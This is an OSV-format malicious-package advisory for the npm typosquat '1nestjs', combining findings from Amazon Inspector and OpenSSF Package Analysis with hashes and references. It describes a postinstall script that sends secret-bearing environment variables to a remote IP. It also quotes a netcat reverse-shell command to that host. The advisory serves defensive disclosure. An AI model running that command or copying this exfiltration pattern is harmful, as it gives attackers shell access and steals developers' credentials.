{"id":"MAL-2026-15909","summary":"Malicious code in 1nestjs (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (71ec2f3aadbe93023b18621b07d44da99f2d1a232a2905add322260456c9ef43)\nPackage name typosquats `nestjs` and declares `postinstall: node index.js` in package.json, so index.js runs automatically during `npm install`. index.js iterates process.env, selects keys matching /^(SECRET|API|TOKEN|KEY)/, and writes the collected values as JSON over a raw TCP connection to 84.32.22.44:9999 (host loaded from servers.json). The same script executes `nc -e /bin/sh 84.32.22.44 9999`, giving the remote host an interactive shell on the installer's machine. package.json metadata self-identifies as a typosquat (description \"Typosquat of nestjs\", author \"typosquat-bot\").\n\n## Source: ossf-package-analysis (bb3da821e3a6871a3e9c27009b213a63c1168355f30084686142c1253603eb71)\nThe OpenSSF Package Analysis project identified '1nestjs' @ 0.0.1 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-09-04T05:45:05.674961497Z","published":"2026-09-03T23:45:56Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-09-03T23:45:56Z","sha256":"bb3da821e3a6871a3e9c27009b213a63c1168355f30084686142c1253603eb71","source":"ossf-package-analysis","versions":["0.0.1"],"import_time":"2026-09-04T05:18:10.340776882Z"},{"id":"IN-MAL-2026-019473","import_time":"2026-09-04T05:39:32.468803222Z","modified_time":"2026-09-04T05:18:58Z","sha256":"71ec2f3aadbe93023b18621b07d44da99f2d1a232a2905add322260456c9ef43","source":"amazon-inspector","versions":["0.0.1"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/1nestjs/v/0.0.1"}],"affected":[{"package":{"name":"1nestjs","ecosystem":"npm","purl":"pkg:npm/1nestjs"},"versions":["0.0.1"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/1nestjs/MAL-2026-15909.json","cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"package_integrity":[{"hashes":{"sha1":"8ab1000960bb42801d3269ad5bd7eeed38cbba1b","sha512_sri":"sha512-XStcYCfDtfUpzs6u7qHBN46EFhbDNqDRvmxPAS5rQRxRKvztdAi+mIODiL/pwxx4wLEqQ7fOIA6apWCuNuCHaA=="},"filename":"1nestjs-0.0.1.tgz"}],"evidence_files":[{"tlsh":"38118c9846e9a57a0ba117d1853242377afbc4303202e6d1719ca2df6e93d180563dfc","path":"index.js","sha256":"3648c3c9eb267990b273a1f8a9c8459fc3e5b228d023efb79e96a3f09245988b"},{"tlsh":"47d05e628c905e2325f88ea58836560ab1a10f3f20355d4bb1bf226852e227184ad72d","path":"package.json","sha256":"8f33149c79c2437f4ebbf9f151e25f43acf5003706db24ef80af1069dd25c30b"}]}}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}